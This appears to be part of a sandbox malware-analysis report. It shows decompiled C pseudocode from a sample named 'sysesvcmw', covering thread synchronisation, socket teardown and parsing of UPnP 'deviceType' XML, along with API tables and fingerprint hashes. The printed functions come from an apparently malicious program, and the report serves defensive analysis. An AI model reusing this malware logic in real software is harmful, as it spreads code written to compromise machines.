                                                                                                                                                                                                                                                                                    				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                                                                                                                                                                                                                    				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = _a4;
                                                                                                                                                                                                                                                                                    					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                                                                                                                                                                                                                    						_v17 = 0 | _a8 != 0xffffffff;
                                                                                                                                                                                                                                                                                    						while(1 != 0) {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							EnterCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							while(_v28 <  *_v16) {
                                                                                                                                                                                                                                                                                    								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                                                                                                                                                                                                                    									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                                                                                                                                                                                                                    									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    									_v24 =  ~_t57 + 1 + _v24;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                                    							if(_v24 !=  *_v16) {
                                                                                                                                                                                                                                                                                    								if((_v17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                                                                                                    									Sleep(1);
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t80 = _a8 - 1;
                                                                                                                                                                                                                                                                                    									_a8 = _t80;
                                                                                                                                                                                                                                                                                    									if(_t80 != 0) {
                                                                                                                                                                                                                                                                                    										goto L15;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L16:
                                                                                                                                                                                                                                                                                    				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040bca3
                                                                                                                                                                                                                                                                                    0x0040bcaf
                                                                                                                                                                                                                                                                                    0x0040bcb5
                                                                                                                                                                                                                                                                                    0x0040bcc0
                                                                                                                                                                                                                                                                                    0x0040bcc9
                                                                                                                                                                                                                                                                                    0x0040bcda
                                                                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                                                                    0x0040bcec
                                                                                                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                                                                                                    0x0040bd07
                                                                                                                                                                                                                                                                                    0x0040bd0d
                                                                                                                                                                                                                                                                                    0x0040bd1f
                                                                                                                                                                                                                                                                                    0x0040bd36
                                                                                                                                                                                                                                                                                    0x0040bd52
                                                                                                                                                                                                                                                                                    0x0040bd5a
                                                                                                                                                                                                                                                                                    0x0040bd62
                                                                                                                                                                                                                                                                                    0x0040bd38
                                                                                                                                                                                                                                                                                    0x0040bd3e
                                                                                                                                                                                                                                                                                    0x0040bd3e
                                                                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                                                                    0x0040bd6e
                                                                                                                                                                                                                                                                                    0x0040bd7c
                                                                                                                                                                                                                                                                                    0x0040bd8d
                                                                                                                                                                                                                                                                                    0x0040bd9c
                                                                                                                                                                                                                                                                                    0x0040bd9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd8f
                                                                                                                                                                                                                                                                                    0x0040bd92
                                                                                                                                                                                                                                                                                    0x0040bd95
                                                                                                                                                                                                                                                                                    0x0040bd98
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd9a
                                                                                                                                                                                                                                                                                    0x0040bd98
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd7c
                                                                                                                                                                                                                                                                                    0x0040bcec
                                                                                                                                                                                                                                                                                    0x0040bcda
                                                                                                                                                                                                                                                                                    0x0040bda9
                                                                                                                                                                                                                                                                                    0x0040bdb4
                                                                                                                                                                                                                                                                                    0x0040bdc0

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BC96
                                                                                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BC9D
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(000000FE,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BCA8
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BCAF
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040BCD2
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040BD07
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040BD52
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040BD6E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040BD9E
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(0040EC84,?,0040E1CE,?,000000FF), ref: 0040BDAD
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF), ref: 0040BDB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9b630854fbef9f049a7081aae18ede4369720886b006fadf81150b85c4d4f177
                                                                                                                                                                                                                                                                                    • Instruction ID: 7471dcba010468c66186aef50ce52d9a71631389d56eaee9496ec156eb60796e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b630854fbef9f049a7081aae18ede4369720886b006fadf81150b85c4d4f177
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7414E74D00209EFDB14CFA4D848BAEBB75FF44305F20C16AE906A7380D7789A81CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040E840(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                                                                                                                                                                                                                    				long _v4;
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t108 = __eax;
                                                                                                                                                                                                                                                                                    				_t106 = __ecx;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0 || __ebx == 0) {
                                                                                                                                                                                                                                                                                    					InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    					_a4 = 1;
                                                                                                                                                                                                                                                                                    					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                                                                                                                                                                                                                    					 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                                    					_a6 = 0;
                                                                                                                                                                                                                                                                                    					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                                    					return _t59;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InterlockedExchange(_t106 + 4, E0040BE60());
                                                                                                                                                                                                                                                                                    				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                                                                                                                                                                                                                    				if(_t64 == 0) {
                                                                                                                                                                                                                                                                                    					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                                                                                                                                                                                                                    							InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                                    							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                                    							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                                    							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                                                                                                                                                                                                                    							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                                    							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                                                                                                                                                                                                                    							return E0040E220(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                                                                                                                                                                                                                    							_push(_t106);
                                                                                                                                                                                                                                                                                    							return E0040E5C0(_t108);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						return InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t73 = _t64 - 1;
                                                                                                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						return _t73;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                                                                                                                                                                                                                    							InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                                                                                                                                                                                                                    							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                                    							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                                    							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                                    							_v8 = _t106 + 8;
                                                                                                                                                                                                                                                                                    							_v4 = __ebx;
                                                                                                                                                                                                                                                                                    							E0040E220(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                                    							_t73 = E0040E7D0(_t106);
                                                                                                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                                    								return _t73;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							return InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                                                    0x0040e84a
                                                                                                                                                                                                                                                                                    0x0040e84c
                                                                                                                                                                                                                                                                                    0x0040e84e
                                                                                                                                                                                                                                                                                    0x0040e9d6
                                                                                                                                                                                                                                                                                    0x0040e9ed
                                                                                                                                                                                                                                                                                    0x0040e9f2
                                                                                                                                                                                                                                                                                    0x0040ea00
                                                                                                                                                                                                                                                                                    0x0040ea07
                                                                                                                                                                                                                                                                                    0x0040ea0c
                                                                                                                                                                                                                                                                                    0x0040ea19
                                                                                                                                                                                                                                                                                    0x0040ea1f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ea1f
                                                                                                                                                                                                                                                                                    0x0040e866
                                                                                                                                                                                                                                                                                    0x0040e86f
                                                                                                                                                                                                                                                                                    0x0040e872
                                                                                                                                                                                                                                                                                    0x0040e935
                                                                                                                                                                                                                                                                                    0x0040e947
                                                                                                                                                                                                                                                                                    0x0040e950
                                                                                                                                                                                                                                                                                    0x0040e96b
                                                                                                                                                                                                                                                                                    0x0040e983
                                                                                                                                                                                                                                                                                    0x0040e98d
                                                                                                                                                                                                                                                                                    0x0040e994
                                                                                                                                                                                                                                                                                    0x0040e998
                                                                                                                                                                                                                                                                                    0x0040e9a2
                                                                                                                                                                                                                                                                                    0x0040e9b1
                                                                                                                                                                                                                                                                                    0x0040e9c0
                                                                                                                                                                                                                                                                                    0x0040e9d1
                                                                                                                                                                                                                                                                                    0x0040e952
                                                                                                                                                                                                                                                                                    0x0040e952
                                                                                                                                                                                                                                                                                    0x0040e955
                                                                                                                                                                                                                                                                                    0x0040e958
                                                                                                                                                                                                                                                                                    0x0040e966
                                                                                                                                                                                                                                                                                    0x0040e966
                                                                                                                                                                                                                                                                                    0x0040e937
                                                                                                                                                                                                                                                                                    0x0040e946
                                                                                                                                                                                                                                                                                    0x0040e946
                                                                                                                                                                                                                                                                                    0x0040e878
                                                                                                                                                                                                                                                                                    0x0040e878
                                                                                                                                                                                                                                                                                    0x0040e87b
                                                                                                                                                                                                                                                                                    0x0040ea2e
                                                                                                                                                                                                                                                                                    0x0040ea2e
                                                                                                                                                                                                                                                                                    0x0040e881
                                                                                                                                                                                                                                                                                    0x0040e887
                                                                                                                                                                                                                                                                                    0x0040e8a3
                                                                                                                                                                                                                                                                                    0x0040e8b4
                                                                                                                                                                                                                                                                                    0x0040e8cc
                                                                                                                                                                                                                                                                                    0x0040e8d6
                                                                                                                                                                                                                                                                                    0x0040e8e0
                                                                                                                                                                                                                                                                                    0x0040e8e4
                                                                                                                                                                                                                                                                                    0x0040e8e8
                                                                                                                                                                                                                                                                                    0x0040e8fa
                                                                                                                                                                                                                                                                                    0x0040e906
                                                                                                                                                                                                                                                                                    0x0040e90a
                                                                                                                                                                                                                                                                                    0x0040e914
                                                                                                                                                                                                                                                                                    0x0040e91b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e921
                                                                                                                                                                                                                                                                                    0x0040e921
                                                                                                                                                                                                                                                                                    0x0040e92d
                                                                                                                                                                                                                                                                                    0x0040e92d
                                                                                                                                                                                                                                                                                    0x0040e889
                                                                                                                                                                                                                                                                                    0x0040e89b
                                                                                                                                                                                                                                                                                    0x0040e89b
                                                                                                                                                                                                                                                                                    0x0040e887
                                                                                                                                                                                                                                                                                    0x0040e87b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 0040E866
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E890
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E8A3
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040E8B4
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E93B
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 0040EA0C
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 0040EA19
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4dfa08af28426b4d1d77860e0f1456d557a2ffbbd5efd9c9b0045f898d83f82c
                                                                                                                                                                                                                                                                                    • Instruction ID: b9f556da3bb5aac27c1329fbefbdde51c01563ae05ed193aa0a017dd72204b88
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dfa08af28426b4d1d77860e0f1456d557a2ffbbd5efd9c9b0045f898d83f82c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D951BD75608701ABC704DF29D888B97FBE4BF88314F008A2EE49D93361D775A558CB96
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C8E0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				WCHAR* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v20);
                                                                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                                                                    						_push(_a4);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                                                                                                                                                                                                                    									_t65 = E0040C200(_v20, L"deviceType");
                                                                                                                                                                                                                                                                                    									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                                    									_v28 = _t65;
                                                                                                                                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                                                                                                                                    										_push( &_v32);
                                                                                                                                                                                                                                                                                    										_push(_v28);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                                    												_v12 = _v20;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v24);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040c8e6
                                                                                                                                                                                                                                                                                    0x0040c8ed
                                                                                                                                                                                                                                                                                    0x0040c8f7
                                                                                                                                                                                                                                                                                    0x0040c900
                                                                                                                                                                                                                                                                                    0x0040c908
                                                                                                                                                                                                                                                                                    0x0040c918
                                                                                                                                                                                                                                                                                    0x0040c92a
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c940
                                                                                                                                                                                                                                                                                    0x0040c944
                                                                                                                                                                                                                                                                                    0x0040c94d
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca33
                                                                                                                                                                                                                                                                                    0x0040c927
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c96f
                                                                                                                                                                                                                                                                                    0x0040c978
                                                                                                                                                                                                                                                                                    0x0040c983
                                                                                                                                                                                                                                                                                    0x0040c9a4
                                                                                                                                                                                                                                                                                    0x0040c9af
                                                                                                                                                                                                                                                                                    0x0040c9b4
                                                                                                                                                                                                                                                                                    0x0040c9b7
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9ca
                                                                                                                                                                                                                                                                                    0x0040c9d3
                                                                                                                                                                                                                                                                                    0x0040c9db
                                                                                                                                                                                                                                                                                    0x0040c9f3
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ca23
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040c92a
                                                                                                                                                                                                                                                                                    0x0040ca38
                                                                                                                                                                                                                                                                                    0x0040ca3e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C99C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C9FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CA17
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                                    • Opcode ID: 165bc14b1495aa1e34f09e783435704cf9eca48613dfae01915159d308c3408b
